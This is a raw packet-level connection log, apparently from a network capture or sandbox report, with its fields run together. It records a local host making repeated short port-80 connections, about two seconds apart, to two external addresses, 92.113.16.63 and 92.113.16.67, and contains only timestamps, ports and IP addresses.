                                  Dec 22, 2024 14:12:45.724874973 CET804979192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:45.725101948 CET4979180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:45.844753981 CET804979192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:47.298543930 CET804979192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:47.298624039 CET804979192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:47.298734903 CET4979180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:47.298796892 CET4979180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:47.299036980 CET804979192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:47.299093962 CET4979180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:47.418207884 CET804979192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:47.460078001 CET4979780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:47.579603910 CET804979792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:47.579705954 CET4979780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:47.582710028 CET4979780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:47.702183008 CET804979792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:47.702296972 CET4979780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:47.821882963 CET804979792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:49.264209986 CET804979792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:49.264269114 CET804979792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:49.264302969 CET804979792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:49.264336109 CET4979780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:49.264379025 CET4979780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:49.264393091 CET4979780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:49.384093046 CET804979792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:49.411155939 CET4980380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:49.531290054 CET804980392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:49.531578064 CET4980380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:49.534415007 CET4980380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:49.653986931 CET804980392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:49.654094934 CET4980380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:49.773585081 CET804980392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:51.145335913 CET804980392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:51.145369053 CET804980392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:51.145466089 CET4980380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:51.146213055 CET804980392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:51.146292925 CET4980380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:51.148905993 CET4980380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:51.268500090 CET804980392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:51.539671898 CET4980880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:51.659189939 CET804980892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:51.659388065 CET4980880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:51.661875010 CET4980880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:51.781384945 CET804980892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:51.781466961 CET4980880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:51.901143074 CET804980892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:53.385320902 CET804980892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:53.385363102 CET804980892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:53.385421991 CET4980880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:53.385474920 CET4980880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:53.385698080 CET804980892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:53.385757923 CET4980880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:53.505033016 CET804980892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:53.533104897 CET4981380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:53.653224945 CET804981392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:53.653464079 CET4981380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:53.656523943 CET4981380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:53.776129007 CET804981392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:53.776209116 CET4981380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:53.895858049 CET804981392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:55.345941067 CET804981392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:55.345988989 CET804981392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:55.346076012 CET804981392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:55.346076965 CET4981380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:55.346139908 CET4981380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:55.346139908 CET4981380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:55.465970039 CET804981392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:55.506136894 CET4981980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:55.626880884 CET804981992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:55.627017975 CET4981980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:55.629004955 CET4981980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:55.748732090 CET804981992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:55.748800039 CET4981980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:55.868324041 CET804981992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:57.219871998 CET804981992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:57.219886065 CET804981992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:57.219949007 CET4981980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:57.219997883 CET4981980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:57.220365047 CET804981992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:57.220434904 CET4981980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:57.339406013 CET804981992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:57.386915922 CET4982580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:57.507456064 CET804982592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:57.510941029 CET4982580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:57.516555071 CET4982580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:57.636094093 CET804982592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:57.639002085 CET4982580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:57.758894920 CET804982592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:59.252799034 CET804982592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:59.252813101 CET804982592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:59.252815962 CET804982592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:59.252986908 CET4982580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:59.253081083 CET4982580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:59.373019934 CET804982592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:59.409734964 CET4982880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:59.529695988 CET804982892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:59.529840946 CET4982880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:59.533334970 CET4982880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:59.652899981 CET804982892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:59.653023958 CET4982880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:59.772768974 CET804982892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:01.214343071 CET804982892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:01.214385986 CET804982892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:01.214418888 CET804982892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:01.214492083 CET4982880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:01.214536905 CET4982880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:01.214536905 CET4982880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:01.334125996 CET804982892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:01.364671946 CET4983480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:01.484406948 CET804983492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:01.484587908 CET4983480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:01.487555027 CET4983480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:01.607160091 CET804983492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:01.607261896 CET4983480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:01.727119923 CET804983492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:03.080998898 CET804983492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:03.081017017 CET804983492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:03.081093073 CET4983480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:03.081135035 CET4983480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:03.081306934 CET804983492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:03.081361055 CET4983480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:03.201616049 CET804983492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:03.242624044 CET4984180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:03.362370014 CET804984192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:03.362482071 CET4984180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:03.365525961 CET4984180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:03.485119104 CET804984192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:03.485305071 CET4984180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:03.604933977 CET804984192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:05.050447941 CET804984192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:05.050488949 CET804984192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:05.050729036 CET4984180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:05.050821066 CET4984180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:05.053414106 CET804984192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:05.056916952 CET4984180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:05.170367956 CET804984192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:05.405087948 CET4984780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:05.524842978 CET804984792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:05.524979115 CET4984780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:05.528803110 CET4984780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:05.648372889 CET804984792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:05.648439884 CET4984780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:05.767985106 CET804984792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:07.230549097 CET804984792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:07.230614901 CET804984792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:07.230683088 CET4984780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:07.230761051 CET4984780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:07.230950117 CET804984792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:07.230999947 CET4984780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:13:07.350348949 CET804984792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:13:07.611228943 CET4985380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:07.730925083 CET804985392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:07.731086969 CET4985380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:07.733023882 CET4985380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:07.852549076 CET804985392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:07.852653980 CET4985380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:07.972260952 CET804985392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:09.430635929 CET804985392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:09.430753946 CET804985392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:09.430876970 CET4985380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:09.430922031 CET4985380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:09.431067944 CET804985392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:09.431193113 CET4985380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:09.551220894 CET804985392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:09.583744049 CET4985980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:09.703254938 CET804985992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:09.703360081 CET4985980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:09.705409050 CET4985980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:09.825480938 CET804985992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:09.825571060 CET4985980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:09.947101116 CET804985992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:11.446013927 CET804985992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:11.446043015 CET804985992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:11.446115017 CET4985980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:11.446170092 CET4985980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:11.446413040 CET804985992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:11.446465015 CET4985980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:11.565637112 CET804985992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:11.587249041 CET4986480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:11.706945896 CET804986492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:11.707072973 CET4986480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:11.709115982 CET4986480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:11.829655886 CET804986492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:11.829832077 CET4986480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:11.949399948 CET804986492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:13.344949961 CET804986492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:13.344963074 CET804986492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:13.344970942 CET804986492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:13.345037937 CET4986480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:13.354887962 CET4986480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:13.474450111 CET804986492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:13.504836082 CET4987080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:13.624459028 CET804987092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:13.624583006 CET4987080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:13.626626968 CET4987080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:13.746289968 CET804987092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:13.746541977 CET4987080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:13.866079092 CET804987092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:15.306358099 CET804987092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:15.306508064 CET804987092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:15.306695938 CET4987080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:15.306695938 CET4987080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:15.307171106 CET804987092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:15.307327986 CET4987080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:15.426649094 CET804987092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:15.458945990 CET4987580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:15.578490019 CET804987592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:15.578577042 CET4987580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:15.581584930 CET4987580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:15.701116085 CET804987592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:15.701196909 CET4987580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:15.820821047 CET804987592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:17.173873901 CET804987592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:17.173912048 CET804987592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:17.173947096 CET804987592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:17.174001932 CET4987580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:17.174047947 CET4987580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:17.174158096 CET4987580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:17.293850899 CET804987592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:17.449322939 CET4987980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:17.569030046 CET804987992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:17.569118977 CET4987980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:17.571537971 CET4987980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:17.691180944 CET804987992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:17.691250086 CET4987980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:17.811356068 CET804987992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:19.186173916 CET804987992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:19.186192989 CET804987992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:19.186341047 CET4987980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:19.186495066 CET804987992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:19.186616898 CET4987980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:19.191987991 CET4987980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:19.311484098 CET804987992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:19.338598967 CET4988580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:19.459055901 CET804988592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:19.459152937 CET4988580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:19.461146116 CET4988580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:19.580851078 CET804988592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:19.580921888 CET4988580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:19.702260017 CET804988592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:21.159703016 CET804988592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:21.159744024 CET804988592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:21.159823895 CET4988580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:21.159826994 CET804988592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:21.159890890 CET4988580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:21.159995079 CET4988580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:21.279936075 CET804988592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:21.321863890 CET4988980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:21.441452980 CET804988992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:21.441536903 CET4988980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:21.443547964 CET4988980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:21.563278913 CET804988992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:21.563410997 CET4988980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:21.682980061 CET804988992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:23.045350075 CET804988992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:23.045397997 CET804988992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:23.045439959 CET804988992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:23.045578003 CET4988980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:23.045608997 CET4988980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:23.165317059 CET804988992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:23.187489986 CET4989580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:23.307364941 CET804989592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:23.307599068 CET4989580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:23.310646057 CET4989580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:23.430504084 CET804989592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:23.430649996 CET4989580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:23.550513983 CET804989592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:25.016725063 CET804989592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:25.016891003 CET804989592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:25.016926050 CET804989592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:25.017096996 CET4989580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:25.017189026 CET4989580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:25.136831045 CET804989592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:25.165309906 CET4990180192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:25.285010099 CET804990192.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:25.285160065 CET4990180192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:25.287127972 CET4990180192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:25.406749010 CET804990192.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:25.406831980 CET4990180192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:25.527307034 CET804990192.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:27.011996984 CET804990192.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:27.012039900 CET804990192.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:27.012094021 CET4990180192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:27.012129068 CET4990180192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:27.012239933 CET804990192.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:27.012295008 CET4990180192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:27.131828070 CET804990192.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:27.151743889 CET4990780192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:27.271502018 CET804990792.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:27.271738052 CET4990780192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:27.274868965 CET4990780192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:27.394567966 CET804990792.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:27.394769907 CET4990780192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:27.514511108 CET804990792.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:28.961195946 CET804990792.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:28.961262941 CET804990792.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:28.961277962 CET804990792.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:28.961340904 CET4990780192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:28.961374998 CET4990780192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:29.086616039 CET804990792.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:29.116460085 CET4991380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:29.236073017 CET804991392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:29.238898039 CET4991380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:29.240976095 CET4991380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:29.360553026 CET804991392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:29.361058950 CET4991380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:29.481651068 CET804991392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:30.980350018 CET804991392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:30.980391026 CET804991392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:30.980550051 CET804991392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:30.980596066 CET4991380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:30.980637074 CET4991380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:30.982379913 CET4991380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:31.102116108 CET804991392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:31.124443054 CET4991980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:31.244219065 CET804991992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:31.244443893 CET4991980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:31.246462107 CET4991980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:31.366168976 CET804991992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:31.366487026 CET4991980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:31.487216949 CET804991992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:32.953111887 CET804991992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:32.953152895 CET804991992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:32.953227043 CET4991980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:32.953258991 CET4991980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:32.953404903 CET804991992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:32.953464985 CET4991980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:33.073596954 CET804991992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:33.097686052 CET4992580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:33.217294931 CET804992592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:33.217377901 CET4992580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:33.220397949 CET4992580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:33.340235949 CET804992592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:33.340411901 CET4992580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:33.462414026 CET804992592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:34.839884996 CET804992592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:34.840003967 CET804992592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:34.840080023 CET4992580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:34.840128899 CET4992580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:34.840486050 CET804992592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:34.840549946 CET4992580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:34.959841967 CET804992592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:34.982481956 CET4993080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:35.102133989 CET804993092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:35.102221966 CET4993080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:35.105237961 CET4993080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:35.224786997 CET804993092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:35.225030899 CET4993080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:35.344582081 CET804993092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:36.785753012 CET804993092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:36.786768913 CET804993092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:36.786856890 CET4993080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:36.786910057 CET4993080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:36.787945032 CET804993092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:36.788006067 CET4993080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:36.906653881 CET804993092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:36.940855980 CET4993480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:37.061110973 CET804993492.113.16.67192.168.2.5
